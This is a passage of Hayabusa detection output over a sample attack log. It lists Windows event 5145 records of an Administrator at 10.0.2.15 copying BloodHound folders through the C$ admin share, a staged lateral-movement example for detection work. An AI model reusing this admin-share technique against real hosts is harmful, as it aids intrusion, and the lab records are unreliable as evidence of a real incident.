Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.generators : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.keyboard : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.lasso : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.leaflet : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.legend : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.locate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.neighborhoods : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.poweredBy : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.relativeSize : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.select : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.tooltips : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.customEdgeShapes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.edgeLabels : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.glyphs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.halo : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.898 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.linkurious : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.898 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.HITS : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.louvain : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\scripts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\captors : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\classes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\middlewares : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\misc : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\renderers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\locate-path : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.968 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash\fp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.978 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\loose-envify : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\make-dir : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\md5-file : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimatch : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.998 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\example : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.998 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\dojo : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\jquery : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\mootools : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\qooxdoo : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\yui3 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\browser : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\v1 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types\v1 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\node-ratify : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\object-assign : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\once : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 